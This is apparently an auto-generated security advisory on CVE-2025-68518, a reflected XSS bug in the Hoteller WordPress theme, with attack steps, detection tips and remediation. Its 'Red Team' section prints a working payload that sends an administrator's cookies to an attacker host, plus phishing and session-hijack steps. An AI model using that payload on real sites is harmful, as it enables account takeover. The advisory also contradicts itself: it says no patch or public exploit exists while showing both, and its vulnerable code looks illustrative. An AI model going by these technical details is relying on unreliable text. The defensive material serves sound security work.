CVE-2025-68518
Executive Summary
CVE-2025-68518 is a reflected Cross-Site Scripting (XSS) vulnerability in the WordPress theme Hoteller by ThemeGoods. The flaw exists in versions prior to 6.8.9, where user-supplied input is not properly neutralized during web page generation. An attacker can craft a malicious link that, when clicked by an authenticated administrator, executes arbitrary JavaScript in the context of the WordPress admin panel. This can lead to session hijacking, privilege escalation, or defacement. The CVSS score is 7.1 (High), and no public exploit code or patch is currently available.

Supply Chain & Package Security
This vulnerability affects a WordPress theme distributed via ThemeGoods. Since it is not an NPM, PyPI, Go, or Ruby package, supply chain risks are limited to the theme’s update mechanism. Users should monitor the vendor’s site for patches and verify the integrity of downloaded theme files.
CVSS Breakdown & Threat Level
- Attack Vector (AV): Network (N) – The attack is launched remotely.
- Attack Complexity (AC): Low (L) – No special conditions required.
- Privileges Required (PR): None (N) – No authentication needed to trigger the XSS.
- User Interaction (UI): Required (R) – The victim must click a crafted link.
- Scope (S): Changed (C) – The XSS can impact resources beyond the vulnerable component.
- Confidentiality (C): Low (L) – Limited data exposure.
- Integrity (I): Low (L) – Limited ability to modify data.
- Availability (A): Low (L) – Limited impact on availability.
Threat Level: High (7.1). The vulnerability is easy to exploit and can lead to admin-level compromise.
Deep Dive & Mechanics
The vulnerability resides in the Hoteller theme’s handling of URL parameters. When a user visits a crafted URL like:
https://example.com/?page_id=1&custom_param=<script>alert('XSS')</script>
The theme reflects the custom_param value directly into the HTML output without sanitization or encoding. This allows an attacker to inject arbitrary JavaScript. Since the attack is reflected, the malicious payload is not stored on the server but is delivered via a link.
Attack Flow:
- Attacker crafts a malicious URL containing JavaScript payload.
- Attacker sends the link to a logged-in administrator (e.g., via email or social engineering).
- Administrator clicks the link, and the script executes in the admin’s browser.
- The script can steal session cookies, create new admin users, or modify site content.
Vulnerable vs. Patched Code
Vulnerable Code (version < 6.8.9):
<?php
// In a template file, e.g., header.php
$custom_param = $_GET['custom_param'];
echo "<div class='custom'>$custom_param</div>";
?>
Patched Code (version 6.8.9+):
<?php
$custom_param = isset($_GET['custom_param']) ? esc_html($_GET['custom_param']) : '';
echo "<div class='custom'>$custom_param</div>";
?>
The patched version uses esc_html() to encode HTML special characters, preventing script injection.
Exploitation & Lab Setup
Red Team (Attacker)
Prerequisites:
- A WordPress site running Hoteller < 6.8.9.
- A victim with admin privileges.
Exploit Steps:
- Craft a malicious URL:
https://target-site.com/?page_id=1&custom_param=<script>new Image().src='https://attacker.com/steal.php?c='+document.cookie</script> - Send the link to the victim via phishing email.
- When the victim clicks, the script sends their session cookie to the attacker’s server.
- Use the stolen cookie to hijack the admin session.
No public exploit code is available.
Blue Team (Defender)
Detection:
- Monitor web server logs for requests containing
<script>tags in query parameters. - Use WAF rules to block reflected XSS patterns.
Hunting:
- Search for
custom_paramin URL parameters with suspicious content. - Check for unusual outbound connections from the WordPress admin panel.
Indicators of Compromise (IOCs)
- Network: HTTP requests with
custom_paramcontaining<script>oronerror=patterns. - Logs: Web server access logs showing
GET /?page_id=1&custom_param=<script>... - Endpoint: Browser console errors or unexpected JavaScript execution in admin pages.
- File: No file-based IOCs as the attack is reflected.

Remediation & Mitigation
Immediate Actions:
- Update the theme to version 6.8.9 or later if available.
- If no patch is available, disable the theme and switch to a secure alternative.
- Implement a Web Application Firewall (WAF) with rules to block reflected XSS patterns.
- Educate administrators about phishing attacks and not clicking suspicious links.
Long-Term Measures:
- Enforce input validation and output encoding in all custom themes.
- Conduct regular security audits of WordPress plugins and themes.
- Monitor vendor channels for patch announcements.
Workaround:
- Add the following
.htaccessrule to block malicious parameters:RewriteCond %{QUERY_STRING} custom_param=.*<script [NC] RewriteRule .* - [F,L]
